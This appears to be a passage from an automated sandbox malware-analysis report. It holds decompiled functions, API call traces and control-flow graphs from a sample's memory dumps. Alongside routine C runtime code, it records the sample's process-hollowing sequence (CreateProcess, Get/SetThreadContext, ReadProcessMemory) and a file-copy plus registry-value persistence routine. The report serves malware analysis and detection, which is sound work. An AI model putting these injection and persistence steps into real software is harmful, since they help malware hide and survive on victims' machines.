                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: InfoSystem
                    • String ID:
                    • API String ID: 31276548-0
                    • Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                    • Instruction ID: 854c0effcf97720dbea36b4306b48eb30308c60dad1b53df4d0d5d158dfb5860
                    • Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                    • Instruction Fuzzy Hash: A8F0A771E1410CABDB18E6B8894DABF7BACE748300F104569E706D3182D93885404664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,005F1F88,7FAB7E30), ref: 005F17B8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040), ref: 005F17E2
                    • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000), ref: 005F17F9
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040), ref: 005F181B
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040,?,00000000,0000000E), ref: 005F188D
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040,?), ref: 005F1898
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040,?), ref: 005F18E3
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                    • String ID:
                    • API String ID: 656311269-0
                    • Opcode ID: 4a568b56e6b6568f10bfb6049f2983b1abefa57c434a2fe01c266273d55ac239
                    • Instruction ID: 437a0da20f010b6ed66d72b2ec36691de5ca11d482f767d428720bf34ce61e16
                    • Opcode Fuzzy Hash: 4a568b56e6b6568f10bfb6049f2983b1abefa57c434a2fe01c266273d55ac239
                    • Instruction Fuzzy Hash: CC518F71E00619BBDB209FB4CD89BBEBBB9BF44750F144525FA01F7281DA7899018B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 98 282e75-282e91 99 282ead 98->99 100 282e93-282e97 98->100 102 282eaf-282eb3 99->102 100->99 101 282e99-282e9b 100->101 103 282e9d-282ea2 call 283cf8 101->103 104 282eb4-282eb9 101->104 115 282ea8 call 283ca6 103->115 106 282ebb-282ec5 104->106 107 282ec7-282eca 104->107 106->107 109 282ee8-282ef8 106->109 110 282ed8-282eda 107->110 111 282ecc-282ed5 call 285760 107->111 113 282efa-282f00 109->113 114 282f02 109->114 110->103 112 282edc-282ee6 110->112 111->110 112->103 112->109 117 282f09-282f0b 113->117 114->117 115->99 120 282feb-282fee 117->120 121 282f11-282f18 117->121 120->102 122 282f1a-282f1f 121->122 123 282f5e-282f61 121->123 122->123 126 282f21 122->126 124 282fbf-282fc0 call 284ee9 123->124 125 282f63-282f67 123->125 132 282fc5-282fc9 124->132 128 282f88-282f8f 125->128 129 282f69-282f72 125->129 130 283019 126->130 131 282f27-282f2b 126->131 135 282f91 128->135 136 282f93-282f96 128->136 133 282f7d-282f82 129->133 134 282f74-282f7b 129->134 139 28301d-283026 130->139 137 282f2d 131->137 138 282f2f-282f32 131->138 132->139 140 282fcb-282fcf 132->140 141 282f84-282f86 133->141 134->141 135->136 142 282f98-282fa4 call 2856b8 call 2855c2 136->142 143 282ff3-282ff7 136->143 137->138 138->143 144 282f38-282f59 call 2856de 138->144 139->102 140->143 145 282fd1-282fe0 140->145 141->136 158 282fa9-282fae 142->158 146 283009-283014 call 283cf8 143->146 147 282ff9-283006 call 285760 143->147 150 282fe3-282fe5 144->150 145->150 146->115 147->146 150->120 150->121 159 28302b-28302f 158->159 160 282fb0-282fb3 158->160 159->139 160->130 161 282fb5-282fbd 160->161 161->150
                    C-Code - Quality: 97%
                    			E00282E75(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                    				signed int _v8;
                    				char* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t82;
                    				char _t89;
                    				signed int _t96;
                    				signed int _t98;
                    				signed int _t101;
                    				signed int _t104;
                    				signed int _t108;
                    				signed int _t109;
                    				char* _t110;
                    				signed int _t120;
                    				signed int _t123;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int _t126;
                    				void* _t127;
                    
                    				_t110 = _a4;
                    				_t108 = _a8;
                    				_t123 = _a12;
                    				_v12 = _t110;
                    				_v8 = _t108;
                    				if(_t123 == 0 || _a16 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					_t131 = _t110;
                    					if(_t110 != 0) {
                    						_t126 = _a20;
                    						__eflags = _t126;
                    						if(_t126 == 0) {
                    							L9:
                    							__eflags = _t108 - 0xffffffff;
                    							if(_t108 != 0xffffffff) {
                    								_t82 = E00285760(_t110, 0, _t108);
                    								_t127 = _t127 + 0xc;
                    							}
                    							__eflags = _t126;
                    							if(__eflags == 0) {
                    								goto L3;
                    							} else {
                    								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                    								if(__eflags > 0) {
                    									goto L3;
                    								}
                    								L13:
                    								_t124 = _t123 * _a16;
                    								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                    								_v20 = _t124;
                    								_t109 = _t124;
                    								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                    									_v16 = 0x1000;
                    								} else {
                    									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                    								}
                    								__eflags = _t124;
                    								if(_t124 == 0) {
                    									L40:
                    									return _a16;
                    								} else {
                    									do {
                    										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                    										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                    											L24:
                    											__eflags = _t109 - _v16;
                    											if(_t109 < _v16) {
                    												_t89 = E00284EE9(_t109, _t124, _t126); // executed
                    												__eflags = _t89 - 0xffffffff;
                    												if(_t89 == 0xffffffff) {
                    													L45:
                    													return (_t124 - _t109) / _a12;
                    												}
                    												__eflags = _v8;
                    												if(_v8 == 0) {
                    													L41:
                    													__eflags = _a8 - 0xffffffff;
                    													if(__eflags != 0) {
                    														E00285760(_a4, 0, _a8);
                    													}
                    													 *((intOrPtr*)(E00283CF8(__eflags))) = 0x22;
                    													L4:
                    													E00283CA6();
                    													goto L5;
                    												}
                    												_v12 = _v12 + 1;
                    												 *_v12 = _t89;
                    												_t109 = _t109 - 1;
                    												_t65 =  &_v8;
                    												 *_t65 = _v8 - 1;
                    												__eflags =  *_t65;
                    												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                    												goto L39;
                    											}
                    											__eflags = _v16;
                    											if(_v16 == 0) {
                    												_t96 = 0x7fffffff;
                    												__eflags = _t109 - 0x7fffffff;
                    												if(_t109 <= 0x7fffffff) {
                    													_t96 = _t109;
                    												}
                    											} else {
                    												__eflags = _t109 - 0x7fffffff;
                    												if(_t109 <= 0x7fffffff) {
                    													_t50 = _t109 % _v16;
                    													__eflags = _t50;
                    													_t120 = _t50;
                    													_t101 = _t109;
                    												} else {
                    													_t120 = 0x7fffffff % _v16;
                    													_t101 = 0x7fffffff;
                    												}
                    												_t96 = _t101 - _t120;
                    											}
                    											__eflags = _t96 - _v8;
                    											if(_t96 > _v8) {
                    												goto L41;
                    											} else {
                    												_push(_t96);
                    												_push(_v12);
                    												_push(E002856B8(_t126)); // executed
                    												_t98 = E002855C2(_t109, _t124, _t126, __eflags); // executed
                    												_t127 = _t127 + 0xc;
                    												__eflags = _t98;
                    												if(_t98 == 0) {
                    													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                    													goto L45;
                    												}
                    												__eflags = _t98 - 0xffffffff;
                    												if(_t98 == 0xffffffff) {
                    													L44:
                    													_t72 = _t126 + 0xc;
                    													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                    													__eflags =  *_t72;
                    													goto L45;
                    												}
                    												_v12 = _v12 + _t98;
                    												_t109 = _t109 - _t98;
                    												_v8 = _v8 - _t98;
                    												goto L39;
                    											}
                    										}
                    										_t104 =  *(_t126 + 4);
                    										__eflags = _t104;
                    										if(__eflags == 0) {
                    											goto L24;
                    										}
                    										if(__eflags < 0) {
                    											goto L44;
                    										}
                    										_t125 = _t109;
                    										__eflags = _t109 - _t104;
                    										if(_t109 >= _t104) {
                    											_t125 = _t104;
                    										}
                    										__eflags = _t125 - _v8;
                    										if(_t125 > _v8) {
                    											goto L41;
                    										} else {
                    											E002856DE(_v12, _v8,  *_t126, _t125);
                    											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                    											 *_t126 =  *_t126 + _t125;
                    											_v12 = _v12 + _t125;
                    											_t109 = _t109 - _t125;
                    											_t127 = _t127 + 0x10;
                    											_v8 = _v8 - _t125;
                    											_t124 = _v20;
                    										}
                    										L39:
                    										__eflags = _t109;
                    									} while (_t109 != 0);
                    									goto L40;
                    								}
                    							}
                    						}
                    						_t82 = (_t82 | 0xffffffff) / _t123;
                    						__eflags = _a16 - _t82;
                    						if(_a16 <= _t82) {
                    							goto L13;
                    						}
                    						goto L9;
                    					}
                    					L3:
                    					 *((intOrPtr*)(E00283CF8(_t131))) = 0x16;
                    					goto L4;
                    				}
                    			}



























                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID: L)(
                    • API String ID: 4048096073-4147288743
                    • Opcode ID: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction ID: 62d10751acd7e7c80dc3ffb0d9d343e068a95c7503e4b14380295952314333a9
                    • Opcode Fuzzy Hash: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction Fuzzy Hash: 9851E739A22206DFCB24FFA9C84465EB7B5AF50320F248629F825A65D0D7709E78DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 162 5f020a-5f02e6 call 5f005f call 5f0073 * 8 PathFileExistsW 182 5f02ec-5f0307 CreateFileW 162->182 183 5f0373-5f0379 162->183 184 5f030d-5f0316 182->184 185 5f0309-5f030b 182->185 184->185 187 5f0318-5f032c VirtualAlloc 184->187 185->183 187->185 188 5f032e-5f033b ReadFile 187->188 188->185 189 5f033d-5f0368 FindCloseChangeNotification CreateFileW WriteFile 188->189 190 5f036d-5f0371 189->190 191 5f036a-5f036c 189->191 190->183 191->190
                    APIs
                    • PathFileExistsW.KERNELBASE(?), ref: 005F02E1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005F02FF
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 005F0324
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 005F0336
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 005F033E
                    • CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 005F0354
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 005F0363
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: File$Create$AllocChangeCloseExistsFindNotificationPathReadVirtualWrite
                    • String ID:
                    • API String ID: 2600930906-0
                    • Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                    • Instruction ID: a5d35c4a137ec97f0489de6df6c4ac683d01aeb4a582db1c3767c5dbb14e5339
                    • Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                    • Instruction Fuzzy Hash: E0416075A00209BAEB109FF49C59FBFBA7CEF44750F14591AFA10F61D1EA788A008769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 193 5f08ef-5f090a call 5f005f 196 5f090d-5f0911 193->196 197 5f0929-5f0936 196->197 198 5f0913-5f0927 196->198 199 5f0939-5f093d 197->199 198->196 200 5f093f-5f0953 199->200 201 5f0955-5f0962 199->201 200->199 202 5f0965-5f0969 201->202 203 5f096b-5f097f 202->203 204 5f0981-5f0a5f call 5f0073 * 8 202->204 203->202 221 5f0a76 204->221 222 5f0a61-5f0a6b 204->222 224 5f0a7a-5f0a96 221->224 222->221 223 5f0a6d-5f0a74 222->223 223->224 226 5f0a9f 224->226 227 5f0a98-5f0a9a 224->227 229 5f0aa6-5f0ace CreateProcessW 226->229 228 5f0e19-5f0e1c 227->228 230 5f0ad5-5f0aee GetThreadContext 229->230 231 5f0ad0 229->231 233 5f0af5-5f0b12 ReadProcessMemory 230->233 234 5f0af0 230->234 232 5f0dcd-5f0dd1 231->232 237 5f0e16-5f0e18 232->237 238 5f0dd3-5f0dd7 232->238 235 5f0b19-5f0b22 233->235 236 5f0b14 233->236 234->232 239 5f0b49-5f0b68 call 5f1b38 235->239 240 5f0b24-5f0b33 235->240 236->232 237->228 241 5f0dea-5f0dee 238->241 242 5f0dd9-5f0de4 238->242 255 5f0b6f-5f0b90 call 5f1c52 239->255 256 5f0b6a 239->256 240->239 243 5f0b35-5f0b42 call 5f1aa3 240->243 245 5f0df6-5f0dfa 241->245 246 5f0df0 241->246 242->241 243->239 259 5f0b44 243->259 247 5f0dfc 245->247 248 5f0e02-5f0e06 245->248 246->245 247->248 252 5f0e08-5f0e0d call 5f1aa3 248->252 253 5f0e12-5f0e14 248->253 252->253 253->228 261 5f0bd5-5f0bf5 call 5f1c52 255->261 262 5f0b92-5f0b99 255->262 256->232 259->232 269 5f0bfc-5f0c11 call 5f00da 261->269 270 5f0bf7 261->270 263 5f0b9b-5f0bc7 call 5f1c52 262->263 264 5f0bd0 262->264 271 5f0bce 263->271 272 5f0bc9 263->272 264->232 275 5f0c1a-5f0c24 269->275 270->232 271->261 272->232 276 5f0c56-5f0c5a 275->276 277 5f0c26-5f0c54 call 5f00da 275->277 279 5f0d3a-5f0d56 call 5f18f1 276->279 280 5f0c60-5f0c6e 276->280 277->275 287 5f0d5a-5f0d7b SetThreadContext 279->287 288 5f0d58 279->288 280->279 283 5f0c74-5f0c82 280->283 283->279 286 5f0c88-5f0ca8 283->286 289 5f0cab-5f0caf 286->289 290 5f0d7f-5f0d89 call 5f19f2 287->290 291 5f0d7d 
287->291 288->232 289->279 292 5f0cb5-5f0cca 289->292 298 5f0d8d-5f0d91 290->298 299 5f0d8b 290->299 291->232 294 5f0cdc-5f0ce0 292->294 296 5f0d1d-5f0d35 294->296 297 5f0ce2-5f0cee 294->297 296->289 300 5f0d1b 297->300 301 5f0cf0-5f0d19 297->301 303 5f0d99-5f0d9d 298->303 304 5f0d93 298->304 299->232 300->294 301->300 305 5f0d9f 303->305 306 5f0da5-5f0da9 303->306 304->303 305->306 307 5f0dab 306->307 308 5f0db1-5f0db5 306->308 307->308 309 5f0db7-5f0dbc call 5f1aa3 308->309 310 5f0dc1-5f0dc7 308->310 309->310 310->229 310->232
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID: D
                    • API String ID: 0-2746444292
                    • Opcode ID: db68dab1a240d278936f63ba377a3d5ca14d2d2a84f4b809fa87d1be2830c529
                    • Instruction ID: f16782f000780bc64888abf9ea0919206425a07a6948f7eac35aba9591d46ce6
                    • Opcode Fuzzy Hash: db68dab1a240d278936f63ba377a3d5ca14d2d2a84f4b809fa87d1be2830c529
                    • Instruction Fuzzy Hash: 9E02D170A0020DEFDB14DF94CD89BBDBBB5BF04305F285459E615AA2A2D778AE80DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 352 2866b4-2866c3 GetEnvironmentStringsW 353 2866c9-2866cc 352->353 354 2866c5-2866c8 352->354 355 2866de-2866e6 call 286c85 353->355 356 2866ce-2866d4 353->356 359 2866eb-2866f0 355->359 356->356 357 2866d6-2866dc 356->357 357->355 357->356 360 2866ff-28670a call 2898b0 359->360 361 2866f2-2866fe FreeEnvironmentStringsW 359->361 360->361
                    C-Code - Quality: 100%
                    			E002866B4() {
                    				WCHAR* _t2;
                    				void* _t4;
                    				void* _t15;
                    				WCHAR* _t17;
                    
                    				_t2 = GetEnvironmentStringsW();
                    				_t17 = _t2;
                    				if(_t17 != 0) {
                    					if( *_t17 != 0) {
                    						goto L3;
                    						do {
                    							do {
                    								L3:
                    								_t2 =  &(_t2[1]);
                    							} while ( *_t2 != 0);
                    							_t2 =  &(_t2[1]);
                    						} while ( *_t2 != 0);
                    					}
                    					_t1 = _t2 - _t17 + 2; // -2
                    					_t10 = _t1;
                    					_t4 = E00286C85(_t1); // executed
                    					_t15 = _t4;
                    					if(_t15 != 0) {
                    						E002898B0(_t15, _t17, _t10);
                    					}
                    					FreeEnvironmentStringsW(_t17);
                    					return _t15;
                    				} else {
                    					return 0;
                    				}
                    			}








                    APIs
                    • GetEnvironmentStringsW.KERNEL32(00000000,002834C3), ref: 002866B7
                    • __malloc_crt.LIBCMT ref: 002866E6
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002866F3
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnvironmentStrings$Free__malloc_crt
                    • String ID:
                    • API String ID: 237123855-0
                    • Opcode ID: bc6fc62333d36050dd4628a73c3a3684cfb70bb877455379f8253cc3b861cb8a
                    • Instruction ID: bcaabd3be9ac1cb0bb9c4001a32e45f8ee12cb551e5e2380e89b971fcad1fe64
                    • Opcode Fuzzy Hash: bc6fc62333d36050dd4628a73c3a3684cfb70bb877455379f8253cc3b861cb8a
                    • Instruction Fuzzy Hash: 75F0827F9225729E9B317F34BC4E867263EDED136031A4426F402D3194FA648DA587A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 364 5f0422-5f077a call 5f005f call 5f0073 * 13 399 5f077e-5f0784 364->399 399->399 400 5f0786-5f079c 399->400 402 5f08e4 400->402 403 5f07a2-5f07b0 400->403 404 5f08e6-5f08ec 402->404 403->402 406 5f07b6-5f07d8 403->406 406->402 409 5f07de-5f07f5 406->409 409->402 411 5f07fb-5f0811 409->411 413 5f0823-5f0831 call 5f037c 411->413 414 5f0813-5f081e 411->414 413->402 418 5f0837-5f084c call 5f020a 413->418 414->404 418->402 421 5f0852-5f0858 418->421 422 5f085e-5f0879 RegGetValueW 421->422 422->402 423 5f087b-5f0895 RegOpenKeyExW 422->423 423->422 424 5f0897-5f08d7 RegSetValueExW 423->424 424->402 428 5f08d9-5f08e2 424->428 428->404
                    APIs
                      • Part of subcall function 005F037C: PathFileExistsW.KERNELBASE(?), ref: 005F0406
                      • Part of subcall function 005F037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 005F0412
                      • Part of subcall function 005F020A: PathFileExistsW.KERNELBASE(?), ref: 005F02E1
                      • Part of subcall function 005F020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005F02FF
                    • RegGetValueW.KERNELBASE(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 005F0875
                    • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020006,?), ref: 005F0891
                    • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000103), ref: 005F08CF
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: File$CreateExistsPathValue$DirectoryOpen
                    • String ID:
                    • API String ID: 3065547873-0
                    • Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                    • Instruction ID: 448aa9b11c8271fa5b2707ab66e172a5fc67df44edbefa6f1954b80b55b60075
                    • Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                    • Instruction Fuzzy Hash: 61D17D21E1435CA9EB20DBF0DC45BBEB778FF44740F10649BE608EB191E7B54A848B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 430 28a591-28a59b 431 28a5b8-28a5c1 430->431 432 28a59d-28a5a7 430->432 433 28a5c3 431->433 434 28a5c4-28a5c9 431->434 432->431 435 28a5a9-28a5b7 call 283cf8 432->435 433->434 436 28a5cb-28a5dc RtlAllocateHeap 434->436 437 28a5de-28a5e5 434->437 436->437 440 28a610-28a612 436->440 441 28a603-28a608 437->441 442 28a5e7-28a5f0 call 28a030 437->442 441->440 444 28a60a 441->444 442->434 446 28a5f2-28a5f7 442->446 444->440 447 28a5f9 446->447 448 28a5ff-28a601 446->448 447->448 448->440
                    C-Code - Quality: 86%
                    			E0028A591(signed int _a4, signed int _a8, long _a12) {
                    				void* _t10;
                    				long _t11;
                    				long _t12;
                    				signed int _t13;
                    				signed int _t17;
                    				long _t19;
                    				long _t24;
                    
                    				_t17 = _a4;
                    				if(_t17 == 0) {
                    					L3:
                    					_t24 = _t17 * _a8;
                    					__eflags = _t24;
                    					if(_t24 == 0) {
                    						_t24 = _t24 + 1;
                    						__eflags = _t24;
                    					}
                    					goto L5;
                    					L6:
                    					_t10 = RtlAllocateHeap( *0x295a6c, 8, _t24); // executed
                    					__eflags = 0;
                    					if(0 == 0) {
                    						goto L7;
                    					}
                    					L14:
                    					return _t10;
                    					goto L15;
                    					L7:
                    					__eflags =  *0x295f5c;
                    					if( *0x295f5c == 0) {
                    						_t19 = _a12;
                    						__eflags = _t19;
                    						if(_t19 != 0) {
                    							 *_t19 = 0xc;
                    						}
                    					} else {
                    						_t11 = E0028A030(_t10, _t24);
                    						__eflags = _t11;
                    						if(_t11 != 0) {
                    							L5:
                    							_t10 = 0;
                    							__eflags = _t24 - 0xffffffe0;
                    							if(_t24 > 0xffffffe0) {
                    								goto L7;
                    							} else {
                    								goto L6;
                    							}
                    						} else {
                    							_t12 = _a12;
                    							__eflags = _t12;
                    							if(_t12 != 0) {
                    								 *_t12 = 0xc;
                    							}
                    							_t10 = 0;
                    						}
                    					}
                    					goto L14;
                    				} else {
                    					_t13 = 0xffffffe0;
                    					_t27 = _t13 / _t17 - _a8;
                    					if(_t13 / _t17 >= _a8) {
                    						goto L3;
                    					} else {
                    						 *((intOrPtr*)(E00283CF8(_t27))) = 0xc;
                    						return 0;
                    					}
                    				}
                    				L15:
                    			}











                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00282E0D,00000000,.(,00286CE0,?,.(,00000000,00000000,00000000,?,002868BA,00000001,00000214,?,002840A2), ref: 0028A5D4
                      • Part of subcall function 00283CF8: __getptd_noexit.LIBCMT ref: 00283CF8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocateHeap__getptd_noexit
                    • String ID: .(
                    • API String ID: 328603210-3375098775
                    • Opcode ID: a0288b3d56fd080026c60d520206077bae1dfcf35c0249c2fb1e6e9f399ef1b3
                    • Instruction ID: 05ecab6c25a69aa0692501236fa3ad2099b6d1adf3358914308b86519dce7a02
                    • Opcode Fuzzy Hash: a0288b3d56fd080026c60d520206077bae1dfcf35c0249c2fb1e6e9f399ef1b3
                    • Instruction Fuzzy Hash: 4E01F5396232269AFF24BF25DC08B6A3758AB81360F05492BE805C75D0DF78C8608B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 449 5f037c-5f040b call 5f005f call 5f0073 * 3 PathFileExistsW 459 5f040d-5f0418 CreateDirectoryW 449->459 460 5f041a-5f041f 449->460 459->460
                    APIs
                    • PathFileExistsW.KERNELBASE(?), ref: 005F0406
                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 005F0412
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CreateDirectoryExistsFilePath
                    • String ID:
                    • API String ID: 2624722123-0
                    • Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                    • Instruction ID: 421a9fda6c3c64d580b1a809d7f59e2e93b289bf385f1ea3758311ee331db20c
                    • Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                    • Instruction Fuzzy Hash: ED11E725A5430CB4EB10ABF0EC1AFBE6735EF80B10F10691BFA04EB1E1E6754A408399
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 461 283031-283045 call 283d50 464 283076 461->464 465 283047-28304a 461->465 466 283078-28307d call 283d95 464->466 465->464 467 28304c-28304f 465->467 469 28307e-283099 call 283652 call 282e75 467->469 470 283051-283055 467->470 482 28309e-2830b3 call 2830b5 469->482 473 283066-283071 call 283cf8 call 283ca6 470->473 474 283057-283063 call 285760 470->474 473->464 474->473 482->466
                    C-Code - Quality: 88%
                    			E00283031(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t19;
                    				intOrPtr _t22;
                    				void* _t33;
                    
                    				_push(0xc);
                    				_push(0x291fe0);
                    				E00283D50(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                    				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                    					L6:
                    					_t19 = 0;
                    				} else {
                    					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                    						E00283652( *((intOrPtr*)(_t33 + 0x18)));
                    						 *((intOrPtr*)(_t33 - 4)) = 0;
                    						_t22 = E00282E75( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                    						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                    						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                    						E002830B5();
                    						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                    					} else {
                    						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                    						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
